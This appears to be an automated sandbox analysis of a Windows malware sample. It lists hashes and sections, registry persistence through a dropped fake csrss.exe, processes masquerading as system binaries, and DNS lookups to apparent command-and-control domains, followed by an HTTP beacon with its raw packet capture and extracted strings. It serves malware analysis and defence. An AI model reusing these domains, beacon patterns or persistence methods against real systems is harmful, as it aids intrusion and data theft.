Analysis Date2014-06-20 13:08:26
MD5d8c835166e9c30fa4af93810e4bc916e
SHA1df7d06e3fe10047f406e766aad5c31a5d4f06a3a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: f49fc584b9ff412fd54ff21ed1450bbb sha1: 98734e1bd95626ecb594b8d10ab7d09caf10c09b size: 169984
Section.rdata md5: 1d4ef944864a7c67e8154731a97d0cbb sha1: 5a8d47fd044fa20c4c034200a1697d1003c41e3b size: 2048
Section.data md5: 4e96f993467a5534f7fba646479b8647 sha1: d851eb297002b1f2a8dc3d5864b561a1db8c235f size: 26112
Section.tls md5: 75ca60194559df6860eaa57a6c3ec4ec sha1: a0f7da148c70f4a0db9defd7d2c5ac6d1abb93a7 size: 512
Timestamp2005-09-19 19:17:10
VersionPrivateBuild: 1519
PEhashcba6338cfcd6f5ae949a49d43988d192dcc100fb
IMPhash404f4cf283877896de14dd02de62ad2e

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSpdasoftstorage.com
Winsock DNS127.0.0.1
Winsock DNSsupportminidevices.com
Winsock DNSonlineinstitute.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSonlineinstitute.com
Type: A
67.227.195.200
DNSsupportminidevices.com
Type: A
DNSpdasoftstorage.com
Type: A
HTTP GEThttp://onlineinstitute.com/g7/images/logo2.jpg?v85=96&tq=gKZEtzypLUdGxpClnTpKuYJZsZSad155FqPRp9Zp%2Bdc%2FiD3FKc1q8qja%2BofIOsyrTSgGUX9toDBFtLfL91TYe96j54nHO3zGluUPIVy8vP2f8Kj%2Bompc%2BZ36HSSeFckTjGWxtBgf9JgV1Hqn03g%2FCGCpO%2BHWbksZ2hM2rhxc45qwCMdMHvfIULC44Du14XzhEJelq%2BL9Km53Kfk3KXP%2Fbx
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 67.227.195.200:80

Raw Pcap
0x00000000 (00000)   47455420 2f67372f 696d6167 65732f6c   GET /g7/images/l
0x00000010 (00016)   6f676f32 2e6a7067 3f763835 3d393626   ogo2.jpg?v85=96&
0x00000020 (00032)   74713d67 4b5a4574 7a79704c 55644778   tq=gKZEtzypLUdGx
0x00000030 (00048)   70436c6e 54704b75 594a5a73 5a536164   pClnTpKuYJZsZSad
0x00000040 (00064)   31353546 71505270 395a7025 32426463   155FqPRp9Zp%2Bdc
0x00000050 (00080)   25324669 4433464b 63317138 716a6125   %2FiD3FKc1q8qja%
0x00000060 (00096)   32426f66 494f7379 72545367 47555839   2BofIOsyrTSgGUX9
0x00000070 (00112)   746f4442 46744c66 4c393154 59653936   toDBFtLfL91TYe96
0x00000080 (00128)   6a35346e 484f337a 476c7555 50495679   j54nHO3zGluUPIVy
0x00000090 (00144)   38765032 66384b6a 2532426f 6d706325   8vP2f8Kj%2Bompc%
0x000000a0 (00160)   32425a33 36485353 6546636b 546a4757   2BZ36HSSeFckTjGW
0x000000b0 (00176)   78744267 66394a67 56314871 6e303367   xtBgf9JgV1Hqn03g
0x000000c0 (00192)   25324643 4743704f 25324248 57626b73   %2FCGCpO%2BHWbks
0x000000d0 (00208)   5a32684d 32726878 63343571 77434d64   Z2hM2rhxc45qwCMd
0x000000e0 (00224)   4d487666 49554c43 34344475 3134587a   MHvfIULC44Du14Xz
0x000000f0 (00240)   68454a65 6c712532 424c394b 6d35334b   hEJelq%2BL9Km53K
0x00000100 (00256)   666b334b 58502532 46627820 48545450   fk3KXP%2Fbx HTTP
0x00000110 (00272)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x00000120 (00288)   3a20636c 6f73650d 0a486f73 743a206f   : close..Host: o
0x00000130 (00304)   6e6c696e 65696e73 74697475 74652e63   nlineinstitute.c
0x00000140 (00320)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000150 (00336)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000160 (00352)   696c6c61 2f322e30 0d0a0d0a            illa/2.0....


Strings
.
..
T..e
.....s....
.....
.
9.D.vU
.
.
.jLd..d
.,
c[.K.
g..
.h3#.U...,
.PI
$Z.E..
t
{Qu..|....
.B
,IW..D.Ba..PO5o..U4yY.
..r..
....#.4 ..N...\=..
.:.V~iU;.
p.
..
O
9.S.PL..'..(.

040904b0
1519
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
2Qs)1UP
4{]9jKl.
4`dg~i
<:,4LJz
?(59M*
\6t{zk
_|6wOX
.7<3{?c
7M>{KS/
|/=81S
?8)TKQ
9l{fKx8
9|U:/)p
[AD9p4
BeginPaint
BMq4N-#
}c8,<K
CallWindowProcA
CharNextA
c#H?wM
CM_Get_DevNode_Status
CMP_WaitNoPendingInstallEvents
CreateFiber
CreateWindowExA
cwI/C?y
d3Mhx~
@.data
DefWindowProcA
DestroyWindow
d L|n~
e}7w'9
EndPaint
EnumResourceNamesA
EqualRect
ExitProcess
GetACP
GetClassInfoExA
GetClientRect
GetCommandLineA
GetFocus
GetKeyState
GetLocaleInfoA
GetParent
GetProcAddress
GetSystemInfo
GetWindowLongA
GnbXo^{(
HeapAlloc
HeapCreate
HeapDestroy
HeapReAlloc
HeapSize
h"*k|ZFOj
HT<+Cm
&Ih P#z
ImYB3~
InterlockedCompareExchange
IntersectRect
InvalidateRect
IsChild
IsDebuggerPresent
IsProcessorFeaturePresent
IsWindow
iuWWLv
 IY||z
JAIkD0n
|JM;YD
)[JpY/
:&Kd;h
KERNEL32.dll
K_j;?9j
l4edr2
l&}5	9
~leR\B
{=LlgGX{
LoadCursorA
LoadLibraryA
m_*\3C
+mI[YS
Mkt=t$
[.m;Ljp
o9'OGV
OffsetRect
O+<ywy 
P7w8YU
PJ>f%i
PtInRect
q8CR=	
+qSivHw&
(%R+Af
`.rdata
RealGetWindowClassA
RegisterClassExA
ReleaseDC
Rich`x
R^~p4H
RtlUnwind
SetFocus
SetThreadPriority
SetUnhandledExceptionFilter
SETUPAPI.dll
SetupDiGetDeviceRegistryPropertyW
SetWindowLongA
SetWindowPos
SetWindowRgn
ShowWindow
~snE4K
SuspendThread
}T9<v+
TerminateProcess
!This program cannot be run in DOS mode.
U+;kZF
UnhandledExceptionFilter
UnionRect
UnregisterClassA
u+r&l$;
USER32.dll
US*~<PD,
;:*U<U
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
_Vx]n\
:w|(\c
wH~V5A
W_K6V_
^W(/MB
WriteFile
w+rkm>H
wsprintfA
WvVhKM
{X]aU*]
xvkHPF
;:)`y*\
=Y5yJN
yJ:O%>
@yn(6'8
ypr:Bu
\YTZt#
z)`J6#!
)Z^O}z
zZJOJo